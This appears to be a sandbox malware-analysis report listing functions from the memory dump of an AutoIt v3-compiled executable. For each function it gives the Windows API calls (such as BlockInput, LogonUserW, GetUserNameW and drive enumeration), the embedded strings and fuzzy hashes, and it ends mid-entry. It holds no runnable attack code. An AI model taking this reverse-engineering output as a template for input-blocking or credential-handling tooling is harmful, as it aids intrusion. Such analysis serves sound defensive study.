Opcode ID: 061bbd7794092d9b8583d4e1d05557f46d0c14fba4f7fd6b4f0f5a41a4e018cd
Instruction ID: f5637d81f21d1845542d3e984b2fe6bfcbc6f2e2ef5697a2b0732f8f51a67e8a
Opcode Fuzzy Hash: 061bbd7794092d9b8583d4e1d05557f46d0c14fba4f7fd6b4f0f5a41a4e018cd
Instruction Fuzzy Hash: 8BB09231065208ABCA822BD1EC09B883F68FB45A62F014010F60D44260CB6254508E91

Function 007E45D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 007E45F0

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 953ff26e68b606f9352ac3e1c08b91d110483894855fd4ba45f7f61f11dfa70f
Instruction ID: 8b7492e3c66c95ce5156e7bd3bff0d04c3e9d9ee77aedbf15dda1ede33b97424
Opcode Fuzzy Hash: 953ff26e68b606f9352ac3e1c08b91d110483894855fd4ba45f7f61f11dfa70f
Instruction Fuzzy Hash: E7E0DF312002099FC710AF6AE804A8AF7E8AF987A0F00C016FC49C7310DBB4EC10CB90

Function 007D51E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 007D5205

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: f3cba4f7cc38f62da89713f13d590e585e11bbad55ccb57a3e3b7d6f98c555ad
Instruction ID: 731af3932b92695dfb3b17e259579c30caedfd06b47e60b9a6625845bb19f86f
Opcode Fuzzy Hash: f3cba4f7cc38f62da89713f13d590e585e11bbad55ccb57a3e3b7d6f98c555ad
Instruction Fuzzy Hash: 45D092A6160E0EBBED5807249E1FF761628F3017C1F94468B7342992C2ECDEA885A831

Function 007C9369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007C8FA7), ref: 007C9389

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: ea1a3c9bc1e9ce8dcb363471d3d40c315f23621c534f888291618cf3946a6772
Instruction ID: c81afaaacd9f0b35017b8b6aa7d9427d3cb634a66fdbc4b303db7b78977f6c4f
Opcode Fuzzy Hash: ea1a3c9bc1e9ce8dcb363471d3d40c315f23621c534f888291618cf3946a6772
Instruction Fuzzy Hash: EDD05E3226090EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A0C775D835AF60

Function 007B0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 007B0734

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: ad94b758054ce6f4be5f46d41e371b2680496015516d9e9a49d4488d4fd3b6ec
Instruction ID: 518e63d414dcb6f73a6d37bc3bdae04cda89082987236895af16791eda4d63d2
Opcode Fuzzy Hash: ad94b758054ce6f4be5f46d41e371b2680496015516d9e9a49d4488d4fd3b6ec
Instruction Fuzzy Hash: CBC04CF1800109DBDB05DBA0D988FEF77BCBB04304F104055A105B2100D7789B448E71

Function 0079A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0079A35A

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 582b41471048701c91109fd0526ccdbc9cf9f622b414d2afcd9faac81fea7543
Instruction ID: 8c64508e539461ca078b036aa156b3e165d08f72d28ab8d1efb7e09472980c35
Opcode Fuzzy Hash: 582b41471048701c91109fd0526ccdbc9cf9f622b414d2afcd9faac81fea7543
Instruction Fuzzy Hash: BAA0113002020CABCA022B82EC08888BFACEA002A0B008020F80C002228B32A8208A80

Function 007E7EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007E7F45
DeleteObject.GDI32(00000000), ref: 007E7F57
DestroyWindow.USER32 ref: 007E7F65
GetDesktopWindow.USER32 ref: 007E7F7F
GetWindowRect.USER32(00000000), ref: 007E7F86
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007E80C7
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007E80D7
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E811F
GetClientRect.USER32(00000000,?), ref: 007E812B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007E8165
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E8187
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E819A
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81A5
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81AE
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81BD
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81C6
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81CD
GlobalFree.KERNEL32(00000000), ref: 007E81D8
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E81EA
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00803C7C,00000000), ref: 007E8200
GlobalFree.KERNEL32(00000000), ref: 007E8210
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007E8236
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007E8255
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E8277
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E8464

Strings

static, xrefs: 007E815F, 007E82B6
DISPLAY, xrefs: 007E82C7
, xrefs: 007E83EA
AutoIt v3, xrefs: 007E8117

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 8b7ba7c2f8992f3e75ab73da82cefdc3473af0e60a1ea9a03b40a136ef751986
Instruction ID: ca345a69639892240665088042a55e0c1ca1e917564545bb16f00d4ebd8755d6
Opcode Fuzzy Hash: 8b7ba7c2f8992f3e75ab73da82cefdc3473af0e60a1ea9a03b40a136ef751986
Instruction Fuzzy Hash: 56027C71900209EFDB54DF65CC89EAE7BB9FB49310F048158F919AB2A1DB75AD01CF60

Function 007F3BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00800980), ref: 007F3C65
IsWindowVisible.USER32(?), ref: 007F3C89

Strings

EDITPASTE, xrefs: 007F3F9D
SENDCOMMANDID, xrefs: 007F4018
FINDSTRING, xrefs: 007F3DB4
GETCURRENTLINE, xrefs: 007F3F2B
CURRENTTAB, xrefs: 007F3CFB
GETLINECOUNT, xrefs: 007F3F04
SELECTSTRING, xrefs: 007F3E44
GETSELECTED, xrefs: 007F3EE1
HIDEDROPDOWN, xrefs: 007F3D3E
GETCURRENTCOL, xrefs: 007F3F66
ISCHECKED, xrefs: 007F3E77
GETLINE, xrefs: 007F3FD9
CHECK, xrefs: 007F3EAB
TABLEFT, xrefs: 007F3CC5
SHOWDROPDOWN, xrefs: 007F3D1E
ADDSTRING, xrefs: 007F3D54
GETCURRENTSELECTION, xrefs: 007F3E21
DELSTRING, xrefs: 007F3D87
UNCHECK, xrefs: 007F3EC1
ISVISIBLE, xrefs: 007F3C75
SETCURRENTSELECTION, xrefs: 007F3DF4
TABRIGHT, xrefs: 007F3CDB
ISENABLED, xrefs: 007F3CA9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 16430bc55123bd6e982645dc52cdbc1ace80f9d02d97383e05f0ef1a22504fa8
Instruction ID: 1532c7b52bb221a6c42781a918de342d59111ee2d28033508f797a7e8afdacf3
Opcode Fuzzy Hash: 16430bc55123bd6e982645dc52cdbc1ace80f9d02d97383e05f0ef1a22504fa8
Instruction Fuzzy Hash: 8DD17D30204218DFCB14EF60D459A7EB7A1EF94344F10845CFA965B3A2CB39ED8ACB91

Function 007FABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 007FAC55
GetSysColorBrush.USER32(0000000F), ref: 007FAC86
GetSysColor.USER32(0000000F), ref: 007FAC92
SetBkColor.GDI32(?,000000FF), ref: 007FACAC
SelectObject.GDI32(?,?), ref: 007FACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 007FACE6
GetSysColor.USER32(00000010), ref: 007FACEE
CreateSolidBrush.GDI32(00000000), ref: 007FACF5
FrameRect.USER32(?,?,00000000), ref: 007FAD04
DeleteObject.GDI32(00000000), ref: 007FAD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 007FAD56
FillRect.USER32(?,?,?), ref: 007FAD88
GetWindowLongW.USER32(?,000000F0), ref: 007FADB3

Part of subcall function 007FAF18: GetSysColor.USER32(00000012), ref: 007FAF51
Part of subcall function 007FAF18: SetTextColor.GDI32(?,?), ref: 007FAF55
Part of subcall function 007FAF18: GetSysColorBrush.USER32(0000000F), ref: 007FAF6B
Part of subcall function 007FAF18: GetSysColor.USER32(0000000F), ref: 007FAF76
Part of subcall function 007FAF18: GetSysColor.USER32(00000011), ref: 007FAF93
Part of subcall function 007FAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FAFA1
Part of subcall function 007FAF18: SelectObject.GDI32(?,00000000), ref: 007FAFB2
Part of subcall function 007FAF18: SetBkColor.GDI32(?,00000000), ref: 007FAFBB
Part of subcall function 007FAF18: SelectObject.GDI32(?,?), ref: 007FAFC8
Part of subcall function 007FAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 007FAFE7
Part of subcall function 007FAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FAFFE
Part of subcall function 007FAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 007FB013

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: bb656e8798032bffeebee81e77be0fc86e144637df0a54c60bdac2021834d394
Instruction ID: 3afa7246bf0925d89c1d4f4405aaacd94b5464896a880cd05eb47fdad10e3d75
Opcode Fuzzy Hash: bb656e8798032bffeebee81e77be0fc86e144637df0a54c60bdac2021834d394
Instruction Fuzzy Hash: B7A19CB2108305BFD7519F64DC08F6B7BA9FF89321F104A19FA66A62A0DB35D840CF52

Function 00772FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00773072
DeleteObject.GDI32(00000000), ref: 007730B8
DeleteObject.GDI32(00000000), ref: 007730C3
DestroyIcon.USER32(00000000,?,?,?), ref: 007730CE
DestroyWindow.USER32(00000000,?,?,?), ref: 007730D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 007AC77C
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007AC7B5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007ACBDE

Part of subcall function 00771F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772412,?,00000000,?,?,?,?,00771AA7,00000000,?), ref: 00771F76

SendMessageW.USER32(?,00001053), ref: 007ACC1B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007ACC32
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACC48
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007ACC53

Strings

0, xrefs: 007ACA72

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: e9fc2afe383de359004fa94b203dcc368dfaa3442aeaeb0b28a0092753cd29ac
Instruction ID: 01b7eca69ebe358a92e30a1d1e9670ec3d3142089a264d3e7a43c3b75dbdbbec
Opcode Fuzzy Hash: e9fc2afe383de359004fa94b203dcc368dfaa3442aeaeb0b28a0092753cd29ac
Instruction Fuzzy Hash: EF12BE30604201EFDB26CF24C888BA9B7E5BF85351F148669F599CB262C739EC41DF91

Function 007827FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031

__wcsnicmp.LIBCMT ref: 0078286A
__wcsnicmp.LIBCMT ref: 0078287E
__wcsnicmp.LIBCMT ref: 00782896
__wcsnicmp.LIBCMT ref: 007828AE
__wcsnicmp.LIBCMT ref: 007828C6
__wcsnicmp.LIBCMT ref: 007828DE
__wcsnicmp.LIBCMT ref: 007828F6
__wcsnicmp.LIBCMT ref: 0078290A
__wcsnicmp.LIBCMT ref: 00782948
__wcsnicmp.LIBCMT ref: 0078295C
__wcsnicmp.LIBCMT ref: 00782970
__wcsnicmp.LIBCMT ref: 00782984

Strings

#notrayicon, xrefs: 00782878
Bad directive syntax error, xrefs: 007BFBD3, 007BFBF0
#pragma compile, xrefs: 00782864
#include, xrefs: 007828D8
Cannot parse #include, xrefs: 007BFCE5
#OnAutoItStartRegister, xrefs: 007828A8
#comments-end, xrefs: 0078296A
#ce, xrefs: 0078297E
#include-once, xrefs: 007828C0
", xrefs: 007BFB89
', xrefs: 007BFB9F
#requireadmin, xrefs: 00782890
#cs, xrefs: 00782904, 00782956
#comments-start, xrefs: 007828F0, 00782942
Unterminated group of comments, xrefs: 007BFCFA

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 9142422d42d5ad10ca4996a68cdea6b09f81bc86527e57b33e353f7f9aa82a02
Instruction ID: 46902a686d92d510bd23c217a7e3a9aaacc05262f513c6a7f65adad707297684
Opcode Fuzzy Hash: 9142422d42d5ad10ca4996a68cdea6b09f81bc86527e57b33e353f7f9aa82a02
Instruction Fuzzy Hash: 9FA18130A40209EBCF14BF61DC5AFAE7BA9BF44740F140029F815AB293DB79AE52D750

Function 007E7B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 007E7BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007E7C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007E7CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007E7CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007E7D1D
GetClientRect.USER32(00000000,?), ref: 007E7D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007E7D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007E7D7C
GetStockObject.GDI32(00000011), ref: 007E7D8C
SelectObject.GDI32(00000000,00000000), ref: 007E7D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007E7DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E7DA9
DeleteDC.GDI32(00000000), ref: 007E7DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007E7DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 007E7DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007E7E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007E7E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 007E7E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007E7E85
GetStockObject.GDI32(00000011), ref: 007E7E90
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007E7E9B
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007E7EA5

Strings

msctls_progress32, xrefs: 007E7E26
static, xrefs: 007E7D67, 007E7E7F
DISPLAY, xrefs: 007E7D72
AutoIt v3, xrefs: 007E7D15

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: e3c37fdf0b7558765da507bd8fbfcc6b98dc48e9b08bd3660c31f711957e570e
Instruction ID: 3a27dc35a54d5857f23e8ed853d287538a8ffecad4e79cde47925006b2cf279a
Opcode Fuzzy Hash: e3c37fdf0b7558765da507bd8fbfcc6b98dc48e9b08bd3660c31f711957e570e
Instruction Fuzzy Hash: 61A160B1A40619BFEB14DB64DC4AFAB7BA9FB49710F108114FA15A72E0D774AD01CF60

Function 007DB353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007DB361
GetDriveTypeW.KERNEL32(?,00802C4C,?,\\.\,00800980), ref: 007DB43E
SetErrorMode.KERNEL32(00000000,00802C4C,?,\\.\,00800980), ref: 007DB59C

Strings

Virtual, xrefs: 007DB564
Network, xrefs: 007DB47C
SSA, xrefs: 007DB525
SCSI, xrefs: 007DB509
PhysicalDrive, xrefs: 007DB3EA
SSD, xrefs: 007DB4C9
CDROM, xrefs: 007DB472
RAID, xrefs: 007DB53A
\\.\, xrefs: 007DB3B3
SATA, xrefs: 007DB54F
iSCSI, xrefs: 007DB541
Removable, xrefs: 007DB490
Fibre, xrefs: 007DB52C
1394, xrefs: 007DB51E
Unknown, xrefs: 007DB45E, 007DB502
ATA, xrefs: 007DB517
MMC, xrefs: 007DB55D
FileBackedVirtual, xrefs: 007DB56B
RAMDisk, xrefs: 007DB468
SAS, xrefs: 007DB548
USB, xrefs: 007DB533
ATAPI, xrefs: 007DB510
Fixed, xrefs: 007DB486

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 29fd4358f09b3cc4327ac38874297f03396e445e5df2a3ae9a655ab4a845e485
Instruction ID: 9d3311a6e13bc5688d634cfa4ece6a80152fb1ea55635362f525f53d9d9bbd5f
Opcode Fuzzy Hash: 29fd4358f09b3cc4327ac38874297f03396e445e5df2a3ae9a655ab4a845e485
Instruction Fuzzy Hash: 2E519E30B41209EBCB00EB20E946A7C77B0FB44740B29812BE457E7391DB7DAE91DB51

Function 007FA041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 007FA0F7
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007FA1B0
SendMessageW.USER32(?,00001102,00000002,?), ref: 007FA1CC

Strings

0, xrefs: 007FA209

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

